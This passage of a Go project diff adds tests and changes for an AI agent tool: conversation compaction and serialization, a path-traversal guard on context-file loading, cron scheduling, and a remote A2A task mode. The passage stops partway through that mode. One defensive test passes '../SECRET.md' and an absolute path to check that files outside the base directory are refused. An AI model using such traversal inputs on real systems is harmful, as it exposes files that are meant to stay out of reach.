+func TestFindTurnStartIndex(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user"},
+		{Role: "assistant"},
+		{Role: "toolResult"},
+		{Role: "assistant"},
+	}
+
+	// From index 3, should find user at index 0
+	idx := FindTurnStartIndex(messages, 3, 0)
+	if idx != 0 {
+		t.Errorf("FindTurnStartIndex(3) = %d, want 0", idx)
+	}
+
+	// From index 1, should find user at index 0
+	idx = FindTurnStartIndex(messages, 1, 0)
+	if idx != 0 {
+		t.Errorf("FindTurnStartIndex(1) = %d, want 0", idx)
+	}
+
+	// No user message found
+	noUserMsgs := []provider.Message{
+		{Role: "assistant"},
+		{Role: "toolResult"},
+	}
+	idx = FindTurnStartIndex(noUserMsgs, 1, 0)
+	if idx != -1 {
+		t.Errorf("FindTurnStartIndex(no user) = %d, want -1", idx)
+	}
+}
+
+func TestFindCutPointNoCutPoints(t *testing.T) {
+	// All toolResult messages → no valid cut points
+	messages := []provider.Message{
+		{Role: "toolResult", Content: "result1"},
+		{Role: "toolResult", Content: "result2"},
+	}
+
+	result := FindCutPoint(messages, 0, len(messages), 10)
+	if result.FirstKeptIndex != 0 {
+		t.Errorf("FirstKeptIndex = %d, want 0", result.FirstKeptIndex)
+	}
+	if result.TurnStartIndex != -1 {
+		t.Errorf("TurnStartIndex = %d, want -1", result.TurnStartIndex)
+	}
+}
+
+func TestFindCutPointSplitTurn(t *testing.T) {
+	// Create messages where cut lands on an assistant message (not user)
+	messages := []provider.Message{
+		{Role: "user", Content: "first question"},
+		{Role: "assistant", Content: "first answer"},
+		{Role: "user", Content: "second question"},
+		{Role: "assistant", Content: strings.Repeat("x", 200)}, // large
+		{Role: "user", Content: "third question"},
+		{Role: "assistant", Content: strings.Repeat("y", 200)}, // large
+	}
+
+	// keepRecentTokens small enough to trigger cut in the middle
+	result := FindCutPoint(messages, 0, len(messages), 20)
+	if result.FirstKeptIndex < 0 || result.FirstKeptIndex >= len(messages) {
+		t.Errorf("FirstKeptIndex = %d, out of range", result.FirstKeptIndex)
+	}
+}
+
+func TestFindCutPointKeepAll(t *testing.T) {
+	// keepRecentTokens very large → keep all messages
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi"},
+	}
+
+	result := FindCutPoint(messages, 0, len(messages), 999999)
+	if result.FirstKeptIndex != 0 {
+		t.Errorf("FirstKeptIndex = %d, want 0 (should keep all)", result.FirstKeptIndex)
+	}
+}
+
 func TestSerializeConversation(t *testing.T) {
 	messages := []provider.Message{
 		{Role: "user", Content: "Hello"},
@@ -212,6 +446,183 @@ func TestSerializeConversation(t *testing.T) {
 	}
 }
 
+func TestSerializeConversationToolResult(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "bash", Content: "output here"},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "Tool Result [bash]") {
+		t.Error("SerializeConversation() missing tool result")
+	}
+	if !contains(result, "output here") {
+		t.Error("SerializeConversation() missing tool output")
+	}
+}
+
+func TestSerializeConversationThinking(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "thinking", Thinking: "hmm let me think"},
+			{Type: "text", Text: "Here is my answer"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[thinking: hmm let me think]") {
+		t.Error("SerializeConversation() missing thinking block")
+	}
+	if !contains(result, "Here is my answer") {
+		t.Error("SerializeConversation() missing text content")
+	}
+}
+
+func TestSerializeConversationToolCall(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "toolCall", ToolCall: &provider.ToolCallBlock{Name: "read", Arguments: []byte(`{"path":"foo.go"}`)}},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[tool_call: read(") {
+		t.Errorf("SerializeConversation() missing tool call, got: %s", result)
+	}
+}
+
+func TestSerializeConversationSystemInjectedSkipped(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello", SystemInjected: true},
+		{Role: "user", Content: "World"},
+	}
+
+	result := SerializeConversation(messages)
+	if contains(result, "Hello") {
+		t.Error("SerializeConversation() should skip system injected messages")
+	}
+	if !contains(result, "World") {
+		t.Error("SerializeConversation() should include normal messages")
+	}
+}
+
+func TestSerializeConversationUserContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "block content"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "User: block content") {
+		t.Errorf("SerializeConversation() missing user content block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationUserNonTextContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "abc"}},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "[image: image/png]") {
+		t.Errorf("SerializeConversation() missing image block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationToolResultContentBlocks(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "tool block output"},
+		}},
+	}
+
+	result := SerializeConversation(messages)
+	if !contains(result, "tool block output") {
+		t.Errorf("SerializeConversation() missing tool result content block, got: %s", result)
+	}
+}
+
+func TestSerializeConversationLongToolResult(t *testing.T) {
+	longContent := strings.Repeat("x", 600)
+	messages := []provider.Message{
+		{Role: "toolResult", ToolName: "bash", Content: longContent},
+	}
+
+	result := SerializeConversation(messages)
+	// Should be truncated to 500 chars + "..."
+	if !contains(result, "...") {
+		t.Error("SerializeConversation() should truncate long tool results")
+	}
+}
+
+func TestTruncateString(t *testing.T) {
+	tests := []struct {
+		input    string
+		maxLen   int
+		expected string
+	}{
+		{"short", 10, "short"},
+		{"exact", 5, "exact"},
+		{"toolong", 4, "tool..."},
+		{"你好世界", 5, "你..."},
+		{"", 10, ""},
+	}
+
+	for _, tt := range tests {
+		result := truncateString(tt.input, tt.maxLen)
+		if result != tt.expected {
+			t.Errorf("truncateString(%q, %d) = %q, want %q", tt.input, tt.maxLen, result, tt.expected)
+		}
+	}
+}
+
+func TestDefaultCompactionSettings(t *testing.T) {
+	s := DefaultCompactionSettings()
+	if !s.Enabled {
+		t.Error("expected Enabled=true")
+	}
+	if s.ReserveTokens != 16384 {
+		t.Errorf("ReserveTokens = %d, want 16384", s.ReserveTokens)
+	}
+	if s.KeepRecentTokens != 20000 {
+		t.Errorf("KeepRecentTokens = %d, want 20000", s.KeepRecentTokens)
+	}
+	if s.IdleCompressionEnabled {
+		t.Error("expected IdleCompressionEnabled=false")
+	}
+	if s.IdleTimeoutSeconds != 90 {
+		t.Errorf("IdleTimeoutSeconds = %d, want 90", s.IdleTimeoutSeconds)
+	}
+	if s.IdleMinTokensForCompress != 150000 {
+		t.Errorf("IdleMinTokensForCompress = %d, want 150000", s.IdleMinTokensForCompress)
+	}
+}
+
+func TestShouldCompactExact(t *testing.T) {
+	// Exactly at threshold
+	if ShouldCompact(183616, 200000, 16384) {
+		t.Error("exactly at threshold should NOT compact")
+	}
+	// One token over
+	if !ShouldCompact(183617, 200000, 16384) {
+		t.Error("one over threshold should compact")
+	}
+}
+
+func TestAbsHelper(t *testing.T) {
+	if abs(-5) != 5 {
+		t.Errorf("abs(-5) = %d, want 5", abs(-5))
+	}
+	if abs(5) != 5 {
+		t.Errorf("abs(5) = %d, want 5", abs(5))
+	}
+	if abs(0) != 0 {
+		t.Errorf("abs(0) = %d, want 0", abs(0))
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
diff --git a/internal/contextfiles/contextfiles.go b/internal/contextfiles/contextfiles.go
index 1222556..7143949 100644
--- a/internal/contextfiles/contextfiles.go
+++ b/internal/contextfiles/contextfiles.go
@@ -66,7 +66,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	// 1. Load from current directory (highest priority)
 	// Only the first matching file is loaded per directory (priority order: AGENTS.md > CLAUDE.md > ...)
 	for _, name := range uniqueNames {
-		path := filepath.Join(cwd, name)
+		path, ok := safeContextFilePath(cwd, name)
+		if !ok {
+			continue
+		}
 		if content, err := os.ReadFile(path); err == nil {
 			result.ProjectFiles = append(result.ProjectFiles, FileContent{
 				Path:    path,
@@ -91,7 +94,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 
 		// Only the first matching file is loaded per parent directory
 		for _, name := range uniqueNames {
-			path := filepath.Join(parent, name)
+			path, ok := safeContextFilePath(parent, name)
+			if !ok {
+				continue
+			}
 			if content, err := os.ReadFile(path); err == nil {
 				result.ParentFiles = append(result.ParentFiles, FileContent{
 					Path:    path,
@@ -108,7 +114,10 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	// Only the first matching file is loaded
 	if globalConfigDir != "" {
 		for _, name := range uniqueNames {
-			path := filepath.Join(globalConfigDir, name)
+			path, ok := safeContextFilePath(globalConfigDir, name)
+			if !ok {
+				continue
+			}
 			if content, err := os.ReadFile(path); err == nil {
 				result.GlobalFiles = append(result.GlobalFiles, FileContent{
 					Path:    path,
@@ -123,6 +132,19 @@ func LoadContextFiles(cwd string, globalConfigDir string, extraFiles []string) *
 	return result
 }
 
+func safeContextFilePath(baseDir, name string) (string, bool) {
+	if filepath.IsAbs(name) {
+		return "", false
+	}
+	base := filepath.Clean(baseDir)
+	path := filepath.Clean(filepath.Join(base, name))
+	rel, err := filepath.Rel(base, path)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
+		return "", false
+	}
+	return path, true
+}
+
 // BuildContextString concatenates all context files into a single string
 // suitable for appending to the system prompt.
 // Order: global -> parent (root to cwd) -> project (current dir)
diff --git a/internal/contextfiles/contextfiles_test.go b/internal/contextfiles/contextfiles_test.go
index baafad0..4505513 100644
--- a/internal/contextfiles/contextfiles_test.go
+++ b/internal/contextfiles/contextfiles_test.go
@@ -86,6 +86,24 @@ func TestExtraFiles(t *testing.T) {
 	}
 }
 
+func TestExtraFilesCannotEscapeBaseDir(t *testing.T) {
+	tmpDir := t.TempDir()
+	projectDir := filepath.Join(tmpDir, "project")
+	os.MkdirAll(projectDir, 0755)
+
+	os.WriteFile(filepath.Join(tmpDir, "SECRET.md"), []byte("# Secret"), 0644)
+	os.WriteFile(filepath.Join(projectDir, "SAFE.md"), []byte("# Safe"), 0644)
+
+	result := LoadContextFiles(projectDir, "", []string{"../SECRET.md", filepath.Join(tmpDir, "SECRET.md"), "SAFE.md"})
+
+	if len(result.ProjectFiles) != 1 {
+		t.Fatalf("expected 1 project file, got %d", len(result.ProjectFiles))
+	}
+	if result.ProjectFiles[0].Name != "SAFE.md" {
+		t.Fatalf("loaded %q, want SAFE.md", result.ProjectFiles[0].Name)
+	}
+}
+
 func TestParentFiles(t *testing.T) {
 	// Create nested directory structure
 	tmpDir := t.TempDir()
diff --git a/internal/cron/cron.go b/internal/cron/cron.go
index 2572289..b92740f 100644
--- a/internal/cron/cron.go
+++ b/internal/cron/cron.go
@@ -3,22 +3,30 @@
 package cron
 
 import (
+	"crypto/rand"
+	"encoding/hex"
 	"encoding/json"
 	"fmt"
 	"os"
 	"path/filepath"
 	"sync"
+	"sync/atomic"
 	"time"
 )
 
+var fallbackCronCounter uint64
+
 // CronJob represents a scheduled task.
 type CronJob struct {
 	ID         string    `json:"id"`
-	Name       string    `json:"name"`            // Short description
-	Prompt     string    `json:"prompt"`           // Task prompt for sub-agent
-	Schedule   string    `json:"schedule"`         // Cron expression (5-field)
-	Mode       string    `json:"mode"`             // "agent" or "yolo"
+	Name       string    `json:"name"`              // Short description
+	Prompt     string    `json:"prompt"`            // Task prompt for sub-agent
+	Schedule   string    `json:"schedule"`          // Schedule: @daily, @every 30m, 5-field cron, or empty for one-shot
+	OneShot    bool      `json:"oneshot,omitempty"` // If true, auto-disable after first run
+	Mode       string    `json:"mode"`              // "agent" or "yolo"
 	WorkDir    string    `json:"work_dir,omitempty"`
+	A2ATarget  string    `json:"a2a_target,omitempty"` // A2A server URL (if set, send task via A2A protocol)
+	A2AToken   string    `json:"a2a_token,omitempty"`  // Bearer token for A2A server
 	Enabled    bool      `json:"enabled"`
 	CreatedAt  time.Time `json:"created_at"`
 	LastRun    time.Time `json:"last_run,omitempty"`
@@ -39,9 +47,9 @@ type CronStore interface {
 
 // FileCronStore persists cron jobs to a JSON file.
 type FileCronStore struct {
-	mu       sync.RWMutex
-	path     string
-	jobs     map[string]*CronJob
+	mu   sync.RWMutex
+	path string
+	jobs map[string]*CronJob
 }
 
 // NewFileCronStore creates a new file-based cron store.
@@ -112,7 +120,7 @@ func (s *FileCronStore) Create(job CronJob) (*CronJob, error) {
 	s.mu.Lock()
 	defer s.mu.Unlock()
 	if job.ID == "" {
-		job.ID = fmt.Sprintf("cron-%d", time.Now().UnixNano())
+		job.ID = newCronID()
 	}
 	if _, exists := s.jobs[job.ID]; exists {
 		return nil, fmt.Errorf("cron job %q already exists", job.ID)
@@ -127,6 +135,15 @@ func (s *FileCronStore) Create(job CronJob) (*CronJob, error) {
 	return &copy, nil
 }
 
+func newCronID() string {
+	var b [16]byte
+	if _, err := rand.Read(b[:]); err == nil {
+		return "cron-" + hex.EncodeToString(b[:])
+	}
+	n := atomic.AddUint64(&fallbackCronCounter, 1)
+	return fmt.Sprintf("cron-%d-%d", time.Now().UnixNano(), n)
+}
+
 // Update updates an existing cron job.
 func (s *FileCronStore) Update(job CronJob) error {
 	s.mu.Lock()
diff --git a/internal/cron/cron_test.go b/internal/cron/cron_test.go
index e50f6a3..dfab660 100644
--- a/internal/cron/cron_test.go
+++ b/internal/cron/cron_test.go
@@ -3,6 +3,7 @@ package cron
 import (
 	"os"
 	"path/filepath"
+	"sync"
 	"testing"
 	"time"
 )
@@ -43,6 +44,30 @@ func TestFileCronStoreCreateDuplicate(t *testing.T) {
 	}
 }
 
+func TestNewCronIDConcurrentUnique(t *testing.T) {
+	const count = 500
+	var wg sync.WaitGroup
+	ids := make(chan string, count)
+
+	for i := 0; i < count; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			ids <- newCronID()
+		}()
+	}
+	wg.Wait()
+	close(ids)
+
+	seen := make(map[string]bool, count)
+	for id := range ids {
+		if seen[id] {
+			t.Fatalf("duplicate id: %s", id)
+		}
+		seen[id] = true
+	}
+}
+
 func TestFileCronStoreList(t *testing.T) {
 	tmp := t.TempDir()
 	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
@@ -214,6 +239,28 @@ func TestSchedulerDefaultInterval(t *testing.T) {
 	}
 }
 
+func TestSchedulerUpdateJobPreservesExistingFields(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+	store.Create(CronJob{ID: "j1", Name: "keep name", Schedule: "@daily", Enabled: true})
+
+	sched := NewScheduler(store, nil, time.Second)
+	sched.updateJob("j1", func(job *CronJob) {
+		job.LastStatus = "running"
+	})
+
+	got, err := store.Get("j1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got.Name != "keep name" {
+		t.Fatalf("name = %q, want keep name", got.Name)
+	}
+	if got.LastStatus != "running" {
+		t.Fatalf("last status = %q, want running", got.LastStatus)
+	}
+}
+
 func TestIsDueNeverRun(t *testing.T) {
 	s := &Scheduler{}
 	job := CronJob{Enabled: true}
@@ -248,11 +295,114 @@ func TestIsDueRecentRun(t *testing.T) {
 
 func TestIsDueOldRun(t *testing.T) {
 	s := &Scheduler{}
+	// A job with no NextRun and already run — should NOT be due (one-shot already done)
 	job := CronJob{
 		Enabled: true,
 		LastRun: time.Now().Add(-2 * time.Hour),
 	}
+	if s.isDue(job, time.Now()) {
+		t.Error("expected not due — no NextRun set, one-shot already completed")
+	}
+
+	// A job with NextRun in the past — should be due
+	job2 := CronJob{
+		Enabled: true,
+		LastRun: time.Now().Add(-2 * time.Hour),
+		NextRun: time.Now().Add(-30 * time.Minute),
+	}
+	if !s.isDue(job2, time.Now()) {
+		t.Error("expected due — NextRun is in the past")
+	}
+}
+
+func TestIsDueOneShotFirstRun(t *testing.T) {
+	s := &Scheduler{}
+	job := CronJob{
+		Enabled: true,
+		OneShot: true,
+		LastRun: time.Time{}, // never run
+	}
 	if !s.isDue(job, time.Now()) {
-		t.Error("expected due for old run (>1h)")
+		t.Error("expected due — one-shot never run")
+	}
+}
+
+func TestIsDuePeriodicJob(t *testing.T) {
+	s := &Scheduler{}
+	next := time.Now().Add(-5 * time.Minute) // 5 min ago
+	job := CronJob{
+		Enabled:  true,
+		Schedule: "@hourly",
+		LastRun:  time.Now().Add(-2 * time.Hour),
+		NextRun:  next,
+	}
+	if !s.isDue(job, time.Now()) {
+		t.Error("expected due — periodic job past NextRun")
+	}
+}
+
+func TestIsDueDisabled(t *testing.T) {
+	s := &Scheduler{}
+	// isDue only checks timing; the checkAndRun loop skips disabled jobs.
+	// But isDue itself should still return true for timing.
+	job := CronJob{
+		Enabled: false,
+		LastRun: time.Time{}, // Never run
+	}
+	// isDue doesn't check Enabled flag — that's checked in checkAndRun.
+	if !s.isDue(job, time.Now()) {
+		t.Error("isDue should return true regardless of Enabled flag")
+	}
+}
+
+func TestSchedulerCheckAndRunSkipsDisabledAndRunning(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	// Create disabled job
+	store.Create(CronJob{ID: "disabled", Name: "Disabled", Enabled: false})
+
+	// Create already running job
+	runningJob := CronJob{ID: "running", Name: "Running", Enabled: true, LastStatus: "running"}
+	store.Create(runningJob)
+
+	sched := NewScheduler(store, nil, time.Second)
+	// Should not panic even with nil manager (neither job should execute)
+	sched.checkAndRun()
+
+	// Verify no changes
+	disabled, _ := store.Get("disabled")
+	if disabled.LastStatus != "" {
+		t.Errorf("disabled job status = %q, want empty", disabled.LastStatus)
+	}
+	running, _ := store.Get("running")
+	if running.LastStatus != "running" {
+		t.Errorf("running job status = %q, want 'running'", running.LastStatus)
+	}
+}
+
+func TestCronJobStructFields(t *testing.T) {
+	now := time.Now()
+	job := CronJob{
+		ID:         "j1",
+		Name:       "Test Job",
+		Prompt:     "Run tests",
+		Schedule:   "0 9 * * *",
+		Mode:       "agent",
+		WorkDir:    "/home/user/project",
+		Enabled:    true,
+		CreatedAt:  now,
+		LastRun:    now,
+		NextRun:    now.Add(time.Hour),
+		RunCount:   5,
+		LastStatus: "success",
+		LastError:  "",
+	}
+
+	if job.ID != "j1" {
+		t.Errorf("ID = %q, want 'j1'", job.ID)
+	}
+	if job.RunCount != 5 {
+		t.Errorf("RunCount = %d, want 5", job.RunCount)
 	}
 }
diff --git a/internal/cron/schedule.go b/internal/cron/schedule.go
new file mode 100644
index 0000000..ecdd779
--- /dev/null
+++ b/internal/cron/schedule.go
@@ -0,0 +1,136 @@
+package cron
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"time"
+)
+
+// ParseSchedule parses a human-readable schedule string into a next-run time.
+// Supported formats:
+//
+//	""           → one-shot (no next run)
+//	"@once"      → one-shot (same as empty)
+//	"@every 30m" → every 30 minutes
+//	"@every 2h"  → every 2 hours
+//	"@every 1d"  → every 1 day
+//	"@hourly"    → every 1 hour
+//	"@daily"     → every 24 hours (midnight)
+//	"@weekly"    → every 7 days
+//	"@monthly"   → 1st of next month
+func ParseSchedule(schedule string, from time.Time) (next time.Time, isOneShot bool, err error) {
+	schedule = strings.TrimSpace(schedule)
+
+	// Empty or @once → one-shot
+	if schedule == "" || schedule == "@once" {
+		return time.Time{}, true, nil
+	}
+
+	// @every Xm / Xh / Xd
+	if strings.HasPrefix(schedule, "@every ") {
+		dur, err := parseDuration(strings.TrimPrefix(schedule, "@every "))
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid @every duration: %w", err)
+		}
+		return from.Add(dur), false, nil
+	}
+
+	// Named schedules
+	switch strings.ToLower(schedule) {
+	case "@hourly":
+		return from.Add(time.Hour), false, nil
+	case "@daily":
+		// Next midnight
+		y, m, d := from.Date()
+		next = time.Date(y, m, d+1, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	case "@weekly":
+		// Next Monday midnight
+		y, m, d := from.Date()
+		daysUntilMon := (8 - int(from.Weekday())) % 7
+		if daysUntilMon == 0 {
+			daysUntilMon = 7
+		}
+		next = time.Date(y, m, d+daysUntilMon, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	case "@monthly":
+		// Next 1st of month
+		y, m, _ := from.Date()
+		next = time.Date(y, m+1, 1, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	}
+
+	// Try standard 5-field cron: min hour day month weekday
+	// Simplified: only support "*/N" in one field for now
+	parts := strings.Fields(schedule)
+	if len(parts) == 5 {
+		return parseCronExpr(parts, from)
+	}
+
+	return time.Time{}, false, fmt.Errorf("unsupported schedule format: %q (use @every Xm, @hourly, @daily, @weekly, @monthly, or 5-field cron)", schedule)
+}
+
+// parseDuration parses "30m", "2h", "1d" into time.Duration.
+func parseDuration(s string) (time.Duration, error) {
+	if strings.HasSuffix(s, "d") {
+		n, err := strconv.Atoi(strings.TrimSuffix(s, "d"))
+		if err != nil {
+			return 0, err
+		}
+		return time.Duration(n) * 24 * time.Hour, nil
+	}
+	return time.ParseDuration(s)
+}
+
+// parseCronExpr handles basic 5-field cron expressions.
+// Supports: exact values, */N (every N), and * (any).
+func parseCronExpr(fields []string, from time.Time) (time.Time, bool, error) {
+	minField := fields[0]
+	hourField := fields[1]
+
+	// Parse minute
+	minStep := 0
+	if strings.HasPrefix(minField, "*/") {
+		n, err := strconv.Atoi(strings.TrimPrefix(minField, "*/"))
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid cron minute: %s", minField)
+		}
+		minStep = n
+	} else if minField != "*" {
+		n, err := strconv.Atoi(minField)
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid cron minute: %s", minField)
+		}
+		// Exact minute: next occurrence today or tomorrow
+		next := time.Date(from.Year(), from.Month(), from.Day(), from.Hour(), n, 0, 0, from.Location())
+		if hourField != "*" {
+			h, err := strconv.Atoi(hourField)
+			if err == nil {
+				next = time.Date(from.Year(), from.Month(), from.Day(), h, n, 0, 0, from.Location())
+			}
+		}
+		if !next.After(from) {
+			next = next.Add(24 * time.Hour)
+		}
+		return next, false, nil
+	}
+
+	// */N minute step
+	if minStep > 0 {
+		currentMin := from.Minute()
+		nextMin := ((currentMin / minStep) + 1) * minStep
+		next := from.Truncate(time.Minute).Add(time.Duration(nextMin-currentMin) * time.Minute)
+		if !next.After(from) {
+			next = next.Add(time.Duration(minStep) * time.Minute)
+		}
+		return next, false, nil
+	}
+
+	// Wildcard: default to hourly
+	next := from.Truncate(time.Minute).Add(time.Minute)
+	if !next.After(from) {
+		next = next.Add(time.Minute)
+	}
+	return next, false, nil
+}
diff --git a/internal/cron/schedule_test.go b/internal/cron/schedule_test.go
new file mode 100644
index 0000000..5b07fb6
--- /dev/null
+++ b/internal/cron/schedule_test.go
@@ -0,0 +1,99 @@
+package cron
+
+import (
+	"testing"
+	"time"
+)
+
+func TestParseScheduleEmpty(t *testing.T) {
+	next, oneShot, err := ParseSchedule("", time.Now())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !oneShot {
+		t.Error("expected one-shot for empty schedule")
+	}
+	if !next.IsZero() {
+		t.Error("expected zero next run for one-shot")
+	}
+}
+
+func TestParseScheduleOnce(t *testing.T) {
+	next, oneShot, err := ParseSchedule("@once", time.Now())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !oneShot {
+		t.Error("expected one-shot for @once")
+	}
+	if !next.IsZero() {
+		t.Error("expected zero next run for @once")
+	}
+}
+
+func TestParseScheduleEveryDuration(t *testing.T) {
+	now := time.Now()
+
+	tests := []struct {
+		schedule string
+		wantDur  time.Duration
+	}{
+		{"@every 30m", 30 * time.Minute},
+		{"@every 2h", 2 * time.Hour},
+		{"@every 1d", 24 * time.Hour},
+	}
+
+	for _, tt := range tests {
+		next, oneShot, err := ParseSchedule(tt.schedule, now)
+		if err != nil {
+			t.Errorf("ParseSchedule(%q): %v", tt.schedule, err)
+			continue
+		}
+		if oneShot {
+			t.Errorf("ParseSchedule(%q): unexpected one-shot", tt.schedule)
+		}
+		got := next.Sub(now).Round(time.Minute)
+		if got != tt.wantDur {
+			t.Errorf("ParseSchedule(%q): got %v, want %v", tt.schedule, got, tt.wantDur)
+		}
+	}
+}
+
+func TestParseScheduleNamed(t *testing.T) {
+	now := time.Date(2026, 5, 29, 15, 30, 0, 0, time.UTC)
+
+	tests := []struct {
+		schedule string
+		wantNext time.Time
+	}{
+		{"@hourly", time.Date(2026, 5, 29, 16, 30, 0, 0, time.UTC)},
+		{"@daily", time.Date(2026, 5, 30, 0, 0, 0, 0, time.UTC)},
+		{"@monthly", time.Date(2026, 6, 1, 0, 0, 0, 0, time.UTC)},
+	}
+
+	for _, tt := range tests {
+		next, oneShot, err := ParseSchedule(tt.schedule, now)
+		if err != nil {
+			t.Errorf("ParseSchedule(%q): %v", tt.schedule, err)
+			continue
+		}
+		if oneShot {
+			t.Errorf("ParseSchedule(%q): unexpected one-shot", tt.schedule)
+		}
+		if !next.Equal(tt.wantNext) {
+			t.Errorf("ParseSchedule(%q): got %v, want %v", tt.schedule, next, tt.wantNext)
+		}
+	}
+}
+
+func TestParseScheduleInvalid(t *testing.T) {
+	_, _, err := ParseSchedule("invalid", time.Now())
+	if err == nil {
+		t.Error("expected error for invalid schedule")
+	}
+
+	_, _, err = ParseSchedule("@every xyz", time.Now())
+	if err == nil {
+		t.Error("expected error for invalid @every duration")
+	}
+}
diff --git a/internal/cron/scheduler.go b/internal/cron/scheduler.go
index cf840aa..bf3a4fa 100644
--- a/internal/cron/scheduler.go
+++ b/internal/cron/scheduler.go
@@ -1,8 +1,13 @@
 package cron
 
 import (
+	"bytes"
 	"context"
+	"encoding/json"
 	"fmt"
+	"io"
+	"log"
+	"net/http"
 	"sync"
 	"time"
 
@@ -19,6 +24,10 @@ type Scheduler struct {
 	mu       sync.Mutex
 }
 
+var a2aHTTPClient = &http.Client{Timeout: 30 * time.Second}
+
+const maxA2AResponseBytes = 1 << 20
+
 // NewScheduler creates a new cron scheduler.
 func NewScheduler(store CronStore, manager *agent.AgentManager, interval time.Duration) *Scheduler {
 	if interval <= 0 {
@@ -85,6 +94,7 @@ func (s *Scheduler) loop() {
 func (s *Scheduler) checkAndRun() {
 	jobs, err := s.store.List()
 	if err != nil {
+		log.Printf("[cron] failed to list jobs: %v", err)
 		return
 	}
 
@@ -112,53 +122,123 @@ func (s *Scheduler) isDue(job CronJob, now time.Time) bool {
 	if !job.NextRun.IsZero() && now.After(job.NextRun) {
 		return true
 	}
-	// Simple interval-based fallback: run if last run was more than 1 hour ago
-	if now.Sub(job.LastRun) > time.Hour {
-		return true
-	}
 	return false
 }
 
-// executeJob runs a cron job by spawning a sub-agent.
+// executeJob runs a cron job by spawning a sub-agent or sending to A2A server.
 func (s *Scheduler) executeJob(job CronJob) {
 	// Mark as running
-	job.LastStatus = "running"
-	job.LastRun = time.Now()
-	s.store.Update(job)
+	startedAt := time.Now()
+	s.updateJob(job.ID, func(current *CronJob) {
+		current.LastStatus = "running"
+		current.LastRun = startedAt
+	})
+
+	var lastErr error
+
+	// A2A target mode: send task to remote A2A server
+	if job.A2ATarget != "" {
+		lastErr = s.executeA2AJob(job)
+	} else {
+		// Local agent mode
+		a, err := s.manager.Create(agent.AgentOptions{
+			Mode:    job.Mode,
+			WorkDir: job.WorkDir,
+		})
+		if err != nil {
+			s.updateJob(job.ID, func(current *CronJob) {
+				current.LastStatus = "failed"
+				current.LastError = fmt.Sprintf("create agent: %v", err)
+			})
+			return
+		}
+
+		ch := a.Run(context.Background(), job.Prompt)
+		for event := range ch {
+			if event.Error != nil {
+				lastErr = event.Error
+			}
+		}
+		s.manager.Destroy(a.ID())
+	}
+
+	s.updateJob(job.ID, func(current *CronJob) {
+		current.RunCount++
+		if lastErr != nil {
+			current.LastStatus = "failed"
+			current.LastError = lastErr.Error()
+		} else {
+			current.LastStatus = "success"
+			current.LastError = ""
+		}
 
-	a, err := s.manager.Create(agent.AgentOptions{
-		Mode:    job.Mode,
-		WorkDir: job.WorkDir,
+		// Compute next run from the latest stored schedule.
+		next, isOneShot, err := ParseSchedule(current.Schedule, time.Now())
+		if err != nil {
+			isOneShot = true
+		}
+		if isOneShot || current.OneShot {
+			current.Enabled = false
+			current.NextRun = time.Time{}
+		} else {
+			current.NextRun = next
+		}
 	})
+}
+
+func (s *Scheduler) updateJob(id string, update func(*CronJob)) {
+	current, err := s.store.Get(id)
 	if err != nil {
-		job.LastStatus = "failed"
-		job.LastError = fmt.Sprintf("create agent: %v", err)
-		s.store.Update(job)
 		return
 	}
+	update(current)
+	_ = s.store.Update(*current)
+}
 
-	ch := a.Run(context.Background(), job.Prompt)
-	var lastErr error
-	for event := range ch {
-		if event.Error != nil {
-			lastErr = event.Error
-		}
+// executeA2AJob sends a task to a remote A2A server.
+func (s *Scheduler) executeA2AJob(job CronJob) error {
+	payload := map[string]any{
+		"jsonrpc": "2.0",
+		"method":  "message/send",
+		"params": map[string]any{
+			"message": map[string]any{
+				"role":  "user",
+				"parts": []map[string]string{{"type": "text", "text": job.Prompt}},
+			},
+		},
+		"id": 1,
 	}
 
-	job.RunCount++
-	if lastErr != nil {
-		job.LastStatus = "failed"
-		job.LastError = lastErr.Error()
-	} else {
-		job.LastStatus = "success"
-		job.LastError = ""
+	body, _ := json.Marshal(payload)
